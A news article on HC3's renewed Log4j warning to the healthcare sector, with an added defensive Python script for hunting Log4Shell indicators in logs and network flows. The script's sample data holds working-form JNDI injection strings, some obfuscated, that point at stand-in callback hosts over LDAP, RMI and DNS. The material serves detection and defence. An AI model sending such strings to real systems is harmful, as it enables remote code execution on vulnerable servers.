HC3 once again asks healthcare and public health sector organizations to protect against Log4j exploitation


The U.S. Department of Health & Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has once again called on healthcare and public health (HPH) sector organizations to take immediate action to protect against Log4j exploitation. The recommendation comes in the wake of the escalating threat posed by these vulnerabilities, which are being widely exploited by attackers.

HC3 has asked HPH sector organizations to identify every asset that uses the Log4j Java library, and in particular every internet-facing asset that accepts data inputs and uses Log4j anywhere in its stack. Organizations should then update or isolate affected assets, assume compromise, identify common post-exploitation sources and activity, and hunt for signs of malicious activity. HC3 also asked HPH sector organizations to monitor for unusual traffic patterns, such as outbound JNDI LDAP/RMI traffic or DMZ systems initiating outbound connections.
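The two detection steps HC3 lists, hunting request logs for JNDI lookup strings and watching for DMZ hosts initiating outbound LDAP/RMI connections, can be illustrated with a small hunting script. The following is an added example written for this article; it is not HC3's guidance text or CISA's log4j-scanner. The log lines, connection records, DMZ range (10.10.1.0/24) and internal ranges are constructed and assumed, and the script also correlates the two data sources, flagging an outbound connection whose destination matches a host seen in a JNDI lookup string, since that indicates the server actually resolved the attacker's lookup.

```python
"""Hunt for Log4Shell (CVE-2021-44228 / CVE-2021-45046) indicators as the HC3 alert
describes: JNDI lookup strings in request logs, and DMZ hosts initiating outbound
LDAP/RMI connections.  Added example; all data below is constructed."""
import ipaddress
import re
import urllib.parse
from typing import Dict, List, Tuple

# --- Constructed sample data (not real telemetry) --------------------------------
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:02:14 +0000] "GET /?q=${${lower:j}ndi:${lower:r}mi://203.0.113.9:1099/Exploit} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [12/Dec/2021:10:02:15 +0000] "GET /login HTTP/1.1" 200 0 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fexfil.example%2Fa%7D"',
    '10.0.0.6 - - [12/Dec/2021:10:03:00 +0000] "POST /api HTTP/1.1" 200 44 "-" "${env:HOME}"',
]
# (source, destination, destination port) records from a firewall or flow collector
SAMPLE_FLOWS: List[Tuple[str, str, int]] = [
    ("10.10.1.20", "10.10.2.5", 5432),      # web tier -> internal database: expected
    ("10.10.1.20", "198.51.100.7", 1389),   # DMZ host -> internet LDAP: JNDI callback
    ("10.10.1.21", "203.0.113.9", 1099),    # DMZ host -> internet RMI
    ("10.10.1.21", "203.0.113.44", 443),    # DMZ host -> internet HTTPS: unusual for a server
    ("10.10.5.3", "203.0.113.44", 443),     # user workstation -> internet: normal
]
DMZ = ipaddress.ip_network("10.10.1.0/24")                      # assumed DMZ range
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
JNDI_PORTS = {389: "ldap", 636: "ldaps", 1389: "ldap (common Log4Shell listener port)", 1099: "rmi"}

# Obfuscation wrappers seen around the lookup: ${lower:j}ndi, ${upper:J}ndi, ${::-j}ndi.
# Each collapses to its literal argument.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^}]*)\}")       # ${x:-j} and ${::-j} -> j
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<proto>[a-z]+)\s*:\s*/{0,2}(?P<target>[^/}\s]*)", re.IGNORECASE)


def normalize(text: str, rounds: int = 4) -> str:
    """URL-decode and collapse nested lookup obfuscation until the text is stable."""
    for _ in range(rounds):
        prev = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == prev:
            break
    return text


def find_jndi_lookups(line: str) -> List[Dict[str, str]]:
    """Return every JNDI lookup in one log line as {protocol, target host[:port]}."""
    return [{"protocol": m.group("proto").lower(), "target": m.group("target")}
            for m in _JNDI.finditer(normalize(line))]


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Findings across a log file, with 1-based line numbers for triage."""
    return [{"line": n, **hit}
            for n, line in enumerate(lines, 1) for hit in find_jndi_lookups(line)]


def suspicious_outbound(flows: List[Tuple[str, str, int]], dmz=DMZ) -> List[Dict[str, object]]:
    """Flag DMZ hosts that initiate connections to non-internal addresses.
    LDAP/RMI destination ports (the JNDI callback channels) are rated high."""
    alerts = []
    for src, dst, dport in flows:
        s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if s not in dmz or any(d in net for net in INTERNAL):
            continue   # not from the DMZ, or internal-to-internal traffic
        reason = JNDI_PORTS.get(dport)
        alerts.append({"src": src, "dst": dst, "port": dport,
                       "severity": "high" if reason else "medium",
                       "reason": reason or "DMZ host initiating outbound connection"})
    return alerts


def correlate(findings: List[Dict[str, object]], alerts: List[Dict[str, object]]):
    """Mark outbound alerts whose destination appears as a JNDI lookup target:
    the vulnerable server resolved the attacker-supplied lookup."""
    targets = {str(f["target"]) for f in findings}          # e.g. "198.51.100.7:1389"
    for a in alerts:
        a["matches_jndi_target"] = f'{a["dst"]}:{a["port"]}' in targets or a["dst"] in targets
    return alerts


if __name__ == "__main__":
    found = scan_logs(SAMPLE_LOGS)
    for f in found:
        print(f"log line {f['line']}: jndi:{f['protocol']} -> {f['target']}")
    for a in correlate(found, suspicious_outbound(SAMPLE_FLOWS)):
        print(f"flow {a['src']} -> {a['dst']}:{a['port']} [{a['severity']}] {a['reason']}"
              f"{' (matches JNDI target)' if a['matches_jndi_target'] else ''}")
```

Matching on the literal string `${jndi:` alone misses the case-mapping and default-value obfuscations, which is why the script normalizes before matching; conversely, `${env:HOME}` and other non-JNDI lookups are left unflagged to keep the hunt focused. Treat a correlated hit (JNDI target plus a matching outbound connection from the same tier) as confirmation that the host was exploitable at that time, not merely probed.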

The agency also pointed the healthcare sector to an open-source log4j-scanner that CISA’s Rapid Action Force (RAF) has made available, derived from scanners created by other members of the open-source community.

“This tool is intended to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities. The GitHub repository below provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046),” HC3 wrote in its latest alert.

The information and code in this repository are provided ‘as is’ and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community, it added. 

HC3 also said that Microsoft has observed CVE-2021-44228 being actively exploited by multiple nation-state-backed groups originating from China, Iran, North Korea, and Turkey. Furthermore, cybercriminal actors, including initial access brokers (IABs), have begun exploiting Log4j to gain initial access to target networks.

In its initial alert on the Log4j vulnerabilities, HC3 noted that Log4j is widely deployed throughout the health sector, as in other industries. “It’s a common application, utilized by many enterprise and cloud applications, including several large and well-known vendors. Therefore, it’s highly likely that the health sector is impacted by this vulnerability, and possibly to a large-scale extent. Log4j is known to be a component in many software platforms, some of which are part of cloud services.”

At the time, HC3 recommended treating the vulnerabilities as a top priority. A large and growing number of vendors have been developing and releasing patches specific to these vulnerabilities, and HC3 expects this list to continue to grow.

The HC3 recommendation came at the same time as recent data from the CyberPeace Institute revealed that at least 39 ransomware operators have attacked one or more healthcare organizations across 27 countries over the past 18 months. These attacks have occurred in the backdrop of the raging COVID-19 pandemic, despite many of these groups’ claims that they would not target healthcare organizations.

“This is a serious issue and it cannot be downplayed how quickly organizations need to respond,” Erik Decker, CISO of Utah-based healthcare delivery system Intermountain Healthcare and co-chair of an HHS cybersecurity advisory task force, said in a statement. “It allows for a bad actor to execute remote code against servers, or downstream servers, that are vulnerable over the internet. Bad actors use vulnerabilities like these as their first step in large-scale compromises. The intention could be data theft, ransomware, or intellectual property theft,” he added.

“It was reported that the Conti ransomware gang is now exploiting this vulnerability to release ransomware on internal systems,” Decker added.

A week after the Log4j2 vulnerability became public, threat prevention and loss avoidance firm AdvIntel discovered “the most concerning trend – the exploitation of the new CVE by one of the most prolific organized ransomware groups – Conti.”

AdvIntel said that Conti plays a special role in the prevailing threat landscape, primarily due to its scale. Divided into several teams, the Russian-speaking Conti made over US$150 million in the last six months, according to AdvIntel research into the ransomware logs, and they continue to expand. 

“It is this expansion that has set Conti on a long quest of searching for new attack surfaces and methods,” Vitali Kremez and Yelisey Boguslavskiy, AdvIntel researchers wrote in a recent post. “Since August, they have employed many new means: hidden RMM backdoors, new backup removal solutions, and, most recently, even an entire operation to revive Emotet.”
